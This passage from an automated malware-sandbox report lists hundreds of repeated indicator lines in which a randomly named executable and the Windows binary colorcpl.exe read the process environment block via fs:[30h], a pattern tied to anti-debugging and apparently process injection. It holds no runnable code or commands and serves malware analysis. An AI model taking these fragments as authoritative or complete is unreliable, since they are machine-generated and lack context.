            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013AC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013AC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013AC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D8E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01461608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013CAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013CAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013CAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013CAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013CAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013B766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013A9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013A9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013A9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013A9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0145FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013B7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013B7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013B7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013B7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013B7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013B7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0145FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013BAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013BAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013DFAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01478ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013A52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013A52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013A52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013A52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013A52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013DD294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013DD294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0143FE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013B76E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D2AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D16E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01470EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01470EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01470EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_014246A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D36CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D2ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E8EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0471746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0478C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0478C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0472A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0472BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047C740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047C740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047C740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04776C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04776C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04776C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04776C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047B14FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04776CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04776CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04776CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047C8CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0470849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0471C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0471C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04717D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04733D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04773540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047A3D40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0477A537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047BE539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047C8D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04724D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04724D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04724D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_046FAD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047A8DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0470D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0470D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047BFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047BFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047BFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047BFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04776DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04776DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04776DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04776DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04776DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04776DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04721DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04721DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04721DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047C05AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047C05AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047235A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_046F2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_046F2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_046F2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_046F2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_046F2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0472FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0472FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04722581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04722581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04722581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04722581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0471AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0471AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0471AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0471AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0471AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0470766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04707E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04707E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04707E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04707E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04707E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04707E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047BAE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047BAE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047AFE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_046FE620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0472A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0472A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_046FC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_046FC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_046FC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04728E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047B1608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047216E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047076E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047C8ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04738EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047AFEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047236CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047746A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047C0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047C0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047C0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0478FE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0470FF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047C8F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0470EF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_046F4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_046F4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0472E730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0471F716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0478FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0478FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047C070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047C070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0472A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0472A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047337F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04777794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04777794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04777794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04708794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047B2073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047C1074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04710050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04710050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0470B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0470B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0470B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0470B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0472002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0472002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0472002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0472002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0472002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04777016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04777016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04777016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047C4015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047C4015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_046F58EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_046F40E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_046F40E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_046F40E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0478B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0478B8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0478B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0478B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0478B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0478B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0472F0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0472F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0472F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047220A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047220A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047220A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047220A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047220A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047220A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047390AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_046F9080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04773884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04773884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_046FC962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_046FB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_046FB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0471B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0471B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0472513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0472513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04714120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04714120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04714120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04714120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04714120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_046F9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_046F9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_046F9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_046FB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_046FB1E1 mov eax, dword ptr fs:[00000030h]
